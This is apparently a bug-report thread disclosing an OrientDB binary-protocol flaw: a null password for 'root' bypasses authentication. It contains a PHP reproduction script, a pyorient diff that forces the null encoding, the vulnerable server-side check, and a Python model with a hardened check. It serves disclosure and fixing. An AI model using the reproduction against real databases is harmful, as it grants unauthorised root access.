Hi,
I am having quite a security issue in the binary protocol in REQUEST_DB_OPEN. By setting user-name to "root" and user-password to 4 bytes xFF the db is opened regardless of what the real root password is.
This can be reproduced by using the PhpOrient driver and the following code:
```php
<?php
// Reproduction with the PhpOrient driver: open the database as "root"
// with a null password and run a query.
require 'PhpOrient/vendor/autoload.php';
use PhpOrient\PhpOrient;

$client = new PhpOrient( 'localhost', 2424 );
// null (or "") is transferred by PhpOrient as pack('N', -1), i.e. 4 bytes xFF
$client->dbOpen('GratefulDeadConcerts', 'root', null);
print_r($client->query( 'select from V' ));
```
I can use both null or an empty string "" as password here without knowing the real root password. PhpOrient transfers an empty password as pack('N', -1), which results in 4 bytes xFF. This only works with "root"; any other user (e.g. "admin") requires the proper password.
I posted this here since I think this is an issue in the binary protocol and not in PhpOrient. Is my configuration somehow wrong or can anybody confirm this behaviour? I tried this both with OrientDB 2.0.8 and 2.1-rc2.
Hi @micha-nerdlichter
yes i can confirm, you're right. I tried also with my other driver pyorient ( hacking it a little bit ):
diff --git a/pyorient/messages/base.py b/pyorient/messages/base.py
index e56273a..e8b9c10 100644
--- a/pyorient/messages/base.py
+++ b/pyorient/messages/base.py
@@ -282,7 +282,10 @@ class BaseMessage(object):
if sys.version_info[0] >= 3:
if isinstance( v, str ):
v = v.encode('utf-8')
- _content = struct.pack("!i", len(v)) + v
+ if v == b'':
+ _content = struct.pack("!i", -1)
+ else:
+ _content = struct.pack("!i", len(v)) + v
elif t['type'] == STRINGS:
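Review bot: the `if v == b'':` branch at the top of the hunk changes how every empty STRING field is encoded by this method, not only the password, so any other empty string would now go on the wire as length -1 (the protocol's null marker) instead of length 0; if this were kept beyond a one-off reproduction, the special case should be narrowed to the credential field or, better, the encoder should refuse to send None/empty credentials at all. As the thread goes on to say, the server is the side that must reject a null password, so this client-side change is only useful to demonstrate that it currently does not.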
Sending an empty string of length of -1 as root password, i can gain the access and root privileges.
Thank you for the confirmation. @lvca So this is pretty serious, right? I narrowed the problem down to Line 464 in OServer.java:
if (user != null && (iPassword == null || user.password.equals(iPassword))) {
iPassword == null
I can't believe this! What kind of backdoor is that? I hope this is by design and the null password should be prevented on a higher level in the binary protocol.
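As an added example, not code from this thread, OrientDB or either driver, the following Python models the wire encoding described above (an int32 length prefix, with -1 meaning null) and places a check mirroring the quoted OServer.java predicate beside a hardened form that rejects null and empty passwords. The in-memory user store, the `authenticate` helper and the use of `hmac.compare_digest` are assumptions for illustration, not OrientDB's actual fix.

```python
import hmac
import struct

# Wire encoding of a binary-protocol STRING field as the thread describes it:
# a big-endian int32 length followed by the bytes, with a length of -1
# (bytes FF FF FF FF) meaning "null". Modelled from the thread, not taken
# from the OrientDB or pyorient sources.


def encode_string(value):
    """Encode str/bytes/None as a length-prefixed protocol string.

    None is sent as length -1. This encoder does not map "" to -1; that
    mapping is what the PhpOrient/pyorient reproductions in the thread did.
    """
    if value is None:
        return struct.pack("!i", -1)
    if isinstance(value, str):
        value = value.encode("utf-8")
    return struct.pack("!i", len(value)) + value


def decode_string(buf, offset=0):
    """Decode one protocol string; returns (value_or_None, new_offset)."""
    (length,) = struct.unpack_from("!i", buf, offset)
    offset += 4
    if length < 0:
        return None, offset  # -1 is the null marker
    return buf[offset:offset + length].decode("utf-8"), offset + length


# Constructed sample user store (assumption for the example).
USERS = {"root": "correct-horse-battery-staple"}


def vulnerable_check(user, password):
    """Mirrors the quoted predicate: a null password short-circuits the
    comparison, so a decoded None is accepted for any known user."""
    stored = USERS.get(user)
    return stored is not None and (password is None or stored == password)


def hardened_check(user, password):
    """Added hardened form: None and "" are rejected before comparing, and
    the comparison is constant-time so it does not leak prefix matches."""
    stored = USERS.get(user)
    if stored is None or not password:
        return False
    return hmac.compare_digest(stored.encode("utf-8"), password.encode("utf-8"))


def authenticate(check, user, wire_password):
    """Run a credential check on a password exactly as it arrived on the wire."""
    password, _ = decode_string(wire_password)
    return check(user, password)


if __name__ == "__main__":
    null_pw = encode_string(None)  # the 4 bytes xFF from the report
    print("vulnerable, root, null password:", authenticate(vulnerable_check, "root", null_pw))
    print("hardened,   root, null password:", authenticate(hardened_check, "root", null_pw))
```

Running the block shows the null password accepted by the mirrored predicate and refused by the hardened one, while the real password still passes; the rejection happens regardless of which user the null arrives for, so the root special case in the report becomes moot.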
This is covered by Java driver, but it's wrong: server side OrientDB should check this. Working on this right now.
Fixed in develop (2.0.-SNAPSHOT). Fixing in 2.0.x (2.0.10-SNAPSHOT)
Thanks @micha-nerdlichter for the report. We'll release 2.0.10 and 2.1-rc3 asap.